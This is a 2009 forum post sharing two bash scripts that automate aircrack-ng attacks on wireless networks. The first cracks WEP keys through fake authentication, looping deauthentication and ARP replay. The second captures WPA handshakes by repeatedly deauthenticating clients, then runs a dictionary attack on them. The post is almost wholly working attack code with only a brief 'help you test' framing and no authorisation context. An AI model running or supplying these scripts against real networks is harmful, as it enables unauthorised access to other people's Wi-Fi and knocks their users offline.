frog_bong Posted November 10, 2009 Share Posted November 10, 2009 We all know that Wired Equivalency Privacy is entirely breakable and that Wireless Protected Access can be broken using a word-list or hash-tables. Here are a couple scripts to HELP you test these things. Make sure aircrack-ng in installed. #!/bin/bash ## ### Automatic wep-cracking script(run this as ROOT): by frogbong(frogbong.wilson@gmail.com) ## Note: This script will not work 100% of the time, it is merely a way to reduce typing # export IFACE export BSSID export CHANNEL ### Check for argument if [ -z $1 ] then echo "Usage: $0 <interface>" echo "Set MONITOR mode interface." exit fi ### Start airodump-ng to collect target information IFACE=$1 sudo airodump-ng $IFACE echo "### TARGET INFORMATION ###" echo "Enter BSSID: "; read BSSID echo "Enter AP Channel: "; read CHANNEL echo "Enter Target MAC(optional): "; read CLNTMAC echo "Starting auto-wep.sh with these parameters: " echo " Interface: $IFACE"; sleep 1 echo " BSSID: $BSSID"; sleep 1 echo " Channel: $CHANNEL"; sleep 1 ### Start wep cracking process using components of aircrack-ng in the background (&) # Start airodump-ng xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w AUTO-WEP $IFACE" & # Start aireplay-ng for fake auth. sleep 3 xterm -e "sudo aireplay-ng -1 0 $IFACE -a $BSSID" & # Wait for fake association before deauth. sleep 5 xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; sleep 10; done" & # Start aireplay-ng for ARP replay xterm -e "sudo aireplay-ng -3 $IFACE -b $BSSID" & # Start cracking .cap file after giving some time to generate initialization vectors(iv's) sleep 60 sudo aircrack-ng AUTO-WEP*.cap #!/bin/bash ## ### Script to help capture wpa-handshake(run this as ROOT): by frogbong(frogbong.wilson@gmail.com) ## # export IFACE export BSSID export CHANNEL export TIME # time between deauth. broadcast export CLIENT # client to deauth. (optional) ### Check for argument if [ -z $1 ] then echo "Usage: $0 <interface>" echo "Set MONITOR mode interface." exit fi ### Start airodump-ng to collect target information IFACE=$1 sudo airodump-ng $IFACE echo "### TARGET INFORMATION ###" echo "Enter BSSID: "; read BSSID echo "Enter AP Channel: "; read CHANNEL echo "Enter deauth. delay: "; read TIME echo "Enter client(optional): "; read CLIENT echo "Starting $0 with these parameters: " echo " Interface: $IFACE"; sleep 1 echo " BSSID: $BSSID"; sleep 1 echo " Channel: $CHANNEL"; sleep 1 echo " Time Delay: $TIME"; sleep 1 if [ "$CLIENT" != "" ] then echo " Client: $CLIENT"; sleep 1 fi ### Start capture and regular deauth. # Start airodump-ng to capture handshake sudo xterm -e "airodump-ng --bssid $BSSID --channel $CHANNEL -w WPA-HS $IFACE" & # Start deauth every 20 minutes sleep 3 # wait for airodump to startup if [ "$CLIENT" != "" ] then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID -c $CLIENT; echo 'Sleeping for $TIME seconds'; sleep $TIME; done" & fi if [ "$CLIENT" = "" ] then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; echo 'Sleeping for $TIME second(s)'; sleep $TIME; done" & fi # Start aircrack-ng in wpa mode to parse the .cap file for handshakes while true; do aircrack-ng -a 2 WPA*.cap -w /usr/share/dict/american-english; sleep 30; done Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.